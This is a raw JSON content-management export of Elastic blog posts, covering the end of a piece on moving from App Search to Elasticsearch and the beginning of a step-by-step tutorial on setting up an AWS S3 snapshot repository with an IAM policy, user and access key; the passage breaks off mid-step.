models","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blt3219ca1c8393527f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-25T14:49:46.703Z","created_by":"bltb6c155cd84fc0c1a","file_size":"144607","filename":"image4.png","parent_uid":null,"tags":[],"title":"image4.png","updated_at":"2024-11-25T14:49:46.703Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-25T16:55:00.472Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3219ca1c8393527f/67448e8a4b282ea41f80dc78/image4.png"},"_metadata":{"uid":"cse3dfaecc0d780c01"},"caption_l10n":"","alt_text_l10n":"machine learning inference","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs58bf26a130919f6b"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnhanced relevance tools:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eImprove your relevance with mid- and late-stage reranking models with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/semantic-reranking-with-retrievers\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esemantic reranking\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and a native implementation of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-learning-to-rank-introduction\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLearning to Rank\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAn out-of-the-box cross encoder reranking model (\u003ca href=\"https://www.elastic.co/search-labs/blog/elastic-semantic-reranker-part-2\" target=\"_self\"\u003eElastic rerank\u003c/a\u003e) for semantic reranking or the the choice to bring your own\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePowerful vector capabilities: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccess \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/tutorials/search-tutorial/vector-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003evector database and vector search tools\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, and easily combine vector and token search with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/tutorials/search-tutorial/semantic-search/hybrid-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehybrid techniques\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eState-of-the-art vector data compression techniques:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/better-binary-quantization-lucene-elasticsearch\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCheck out BBQ\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e!\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eLarge language model (LLM)-powered chat experience:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Get your retrieval augmented generation (RAG) workflows started quickly with an out-of-the-box chat experience powered by LLMs with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/rag-playground-introduction\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI Playground\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e!\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csc9a65b96499dc2e8"}}},{"image":{"image":{"uid":"bltc26ad76059b6bca4","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-25T14:50:43.440Z","created_by":"bltb6c155cd84fc0c1a","file_size":"316894","filename":"Screenshot_2024-11-25_at_9.50.33_AM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-11-25 at 9.50.33 AM.png","updated_at":"2024-11-25T14:50:43.440Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-25T16:55:00.456Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc26ad76059b6bca4/67448ec3ede4164ab0a1d14c/Screenshot_2024-11-25_at_9.50.33_AM.png"},"_metadata":{"uid":"csd5da9950a7e7fc4a"},"caption_l10n":"","alt_text_l10n":"playground","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"image":{"image":{"uid":"blt77a2faf32274c5b4","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-25T14:51:37.814Z","created_by":"bltb6c155cd84fc0c1a","file_size":"356623","filename":"Screenshot_2024-11-25_at_9.51.25_AM.png","parent_uid":null,"tags":[],"title":"Screenshot 2024-11-25 at 9.51.25 AM.png","updated_at":"2024-11-25T14:51:37.814Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-25T16:55:00.441Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt77a2faf32274c5b4/67448ef90491cf57e9ef0348/Screenshot_2024-11-25_at_9.51.25_AM.png"},"_metadata":{"uid":"csd73b3b81255562ae"},"caption_l10n":"","alt_text_l10n":"customize elasticsearch query","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa21a03d9e0f4ae3e"},"header_style":"H2","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eStreamlined architecture:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Eliminate the need for Enterprise search nodes while enabling efficient scaling and delivering performance boosts through index tuning and optimized Elasticsearch queries.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAll of the above — with great UI experiences to manage your relevance — measure the efficacy of your search and expand to future goals that meet our organization’s search needs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Ready to migrate? ","_metadata":{"uid":"csa96a38aeed3e64a2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe transition is easy since App Search is based on Elasticsearch indices. We have \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/enterprise-search/app-search-engine-exporter.ipynb\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ea Python notebook to help with migration\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, as well as \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/app-search/current/index.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ea feature comparison table in the App Search documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWant to try it out before transitioning? We have a fully managed version of \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/serverless-registration\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch Serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to get you started.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The future of search is Elasticsearch!","_metadata":{"uid":"cs6a1cfe62787dcbdf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned — we're continuing to roll out even more exciting search features in Elasticsearch, such as an Elastic inference service for GPU workloads and even better LLM support.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbc24726eb35c1761"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8fea87a3421ca422"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs050cdcd9ec9ad682"}}}],"publish_date":"2024-11-25","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"App Search will be discontinued in 9.0 versions, but Elasticsearch has everything you need to build powerful AI-powered search experiences. Here’s what you need to know.","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blte1906c436045dbef","ACL":{},"created_at":"2020-06-17T03:31:19.243Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"app-search","label_l10n":"App search","tags":[],"title":"App search","updated_at":"2020-07-06T22:20:20.511Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.547Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt9ec588943c692b05","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-25T14:44:05.982Z","created_by":"bltb6c155cd84fc0c1a","file_size":"175670","filename":"139686_-_Elastic_-_Headers_-_V1_5_(1).jpg","parent_uid":null,"tags":[],"title":"139686 - Elastic - Headers - V1_5 (1).jpg","updated_at":"2024-11-25T14:44:05.982Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-25T16:55:00.485Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9ec588943c692b05/67448d35eae8d9e57a8fdbbc/139686_-_Elastic_-_Headers_-_V1_5_(1).jpg"},"title":"From App Search to Elasticsearch — Tap into the future of search","title_l10n":"From App Search to Elasticsearch — Tap into the future of search","updated_at":"2024-11-25T14:54:03.202Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/app-search-to-elasticsearch","publish_details":{"time":"2024-11-25T16:55:00.402Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta66650a86434fe33","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Capture a snapshot backup of your Elasticsearch cluster running in Elastic Cloud via a custom AWS S3 snapshot repository in under 10 minutes.","author":["blt1dc9d598a13435ac","bltddff0459e563bc78"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-21T00:50:21.765Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csaaa542946249b34a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog, we will walk through backing up our committed cluster data via \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshot-restore.html#snapshot-restore-warnings\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch’s snapshots\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e into an AWS S3 bucket. In Elastic Cloud (Enterprise), Elastic provides a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-snapshot-restore.html\"\u003e\u003cspan style='font-size: 12pt;'\u003ebuilt-in backup service\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e under its \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003efound-snapshots\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e repository. Elasticsearch also supports custom repositories for both \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-custom-repository.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eCloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshot-restore.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eon-prem\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e setups, connecting to data stores like \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/repository-s3.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS S3\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/repository-gcs.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eGCP\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/repository-azure.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eAzure\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for all platform types and also \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/snapshots-filesystem-repository.html\"\u003e\u003cspan style='font-size: 12pt;'\u003efilesystem\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for on-prem. These built-in and custom snapshot repositories offer great options for data backups; custom repositories for longer term storage and on-off backups; and found snapshots for ongoing, recent backups. Users often integrate both methods into their production clusters.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Create AWS S3 bucket","_metadata":{"uid":"cs37726484d42128ab"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo begin, we will set up an \u003c/span\u003e\u003ca href=\"https://aws.amazon.com/s3/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS S3 bucket\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to store our date following the \u003c/span\u003e\u003ca href=\"https://docs.aws.amazon.com/AmazonS3/latest/userguide/create-bucket-overview.html\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS guide\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs64e9abbbab97d082"}}},{"image":{"image":{"uid":"bltc5cc59e94bf349b2","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:50:58.236Z","created_by":"bltb6c155cd84fc0c1a","file_size":"228339","filename":"1.png","parent_uid":null,"tags":[],"title":"1.png","updated_at":"2024-11-21T00:50:58.236Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.028Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc5cc59e94bf349b2/673e83f2d57505f728c119dd/1.png"},"_metadata":{"uid":"cs1d226da60ef1bb24"},"caption_l10n":"","alt_text_l10n":"1 - Create AWS S3 bucket","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1091c93300e33f9d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnder \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate bucket\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, fill in the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBucket name\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and leave all other options at their defaults. Then, click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to create this bucket to hold our data. For our example, the bucket name will be \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3-custom-repository-bucket-demo\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Setup AWS IAM policy","_metadata":{"uid":"cs501c8d4a7e364cd2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNext, we will set up access authorization to our newly created bucket by \u003c/span\u003e\u003ca href=\"https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_create.html\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ecreating an AWS IAM policy\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csebbbe0f2678184aa"}}},{"image":{"image":{"uid":"bltda8d7b7a05e420ae","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:06.207Z","created_by":"bltb6c155cd84fc0c1a","file_size":"217269","filename":"2.png","parent_uid":null,"tags":[],"title":"2.png","updated_at":"2024-11-21T00:51:06.207Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:00.993Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltda8d7b7a05e420ae/673e83fac1b38af2f300e34b/2.png"},"_metadata":{"uid":"cs4a4c406cdaa97006"},"caption_l10n":"","alt_text_l10n":"2 - specify permissions","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3c0f8aef032769cb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnder the first step for \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate policy\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e called \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSpecify permissions\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we will copy Elastic Cloud’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-aws-custom-repository.html#ec-prepare-aws-bucket\"\u003e\u003cspan style='font-size: 12pt;'\u003erecommended S3 permissions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e into the JSON “Policy editor” — only retaining the value AWS originally had for its “Version” JSON key. You may prefer further permission restrictions as outlined within \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/repository-s3.html#repository-s3-permissions\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch’s documentation\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. We will replace the guide’s JSON’s placeholder \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ebucket-name\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eResource\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e with our bucket name \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3-custom-repository-bucket-demo\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Then, we will select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to proceed to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 2: Review and create\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1610d0a2f8354663"}}},{"image":{"image":{"uid":"blt1e3eb9691353ba23","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:12.949Z","created_by":"bltb6c155cd84fc0c1a","file_size":"239758","filename":"3.png","parent_uid":null,"tags":[],"title":"3.png","updated_at":"2024-11-21T00:51:12.949Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:00.932Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1e3eb9691353ba23/673e8400c630cf7bf6919cee/3.png"},"_metadata":{"uid":"cs9c2924aaec3de903"},"caption_l10n":"","alt_text_l10n":"3 - review and create","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3d0da6cee8630ba7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe will enter a \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePolicy name\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDescription\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, then select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. For our example, the policy name will be \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3-custom-repository-demo-policy\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Create IAM user","_metadata":{"uid":"csbd26d286d012a76d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNext, we will \u003c/span\u003e\u003ca href=\"https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ecreate an AWS IAM user\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, granting it authorization by way of our newly created IAM policy. Under the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate user\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e flow, we will begin with \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 1: Specify user details\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. We will enter the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003euser name\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003es3-custom-repository-demo-user\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, leave all other options on the page at their defaults, and select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to move on to \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 2: Set permission\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csed0bd3d1f1b90630"}}},{"image":{"image":{"uid":"blt89cb79b02cd2786f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-21T00:51:19.941Z","created_by":"bltb6c155cd84fc0c1a","file_size":"330516","filename":"4.png","parent_uid":null,"tags":[],"title":"4.png","updated_at":"2024-11-21T00:51:19.941Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-22T14:00:01.113Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt89cb79b02cd2786f/673e8407ebebdcb4b30e3c5c/4.png"},"_metadata":{"uid":"cs2a325bdeec9bc859"},"caption_l10n":"","alt_text_l10n":"4 - set permissions","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csa5f6b6fae2189675"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere, we will attach the IAM policy to our user by selecting the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePermissions Options\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e value and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAttach polices directly\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Then, under \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePermissions policies\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, we will search and enable our IAM policy. Once done, we will leave all other options at their defaults and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNext\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to move onto \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStep 3: Review and create\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e then scroll through and click \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate user\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Setup IAM user access key","_metadata":{"uid":"cs54b365c52fe21fe7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch connects to AWS S3 via an IAM user’s \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-configuring-keystore.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eaccess and secret key\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e as opposed to its username and password. In order to connect the bucket to our Elasticsearch cluster, we will create an access and secret key to later store in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-configuring-keystore.html\"\u003e\u003cspan style='font-size: 12pt;'\u003edeployment’s Elasticsearch keystore\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Under our IAM user, we will select \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCreate access key\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 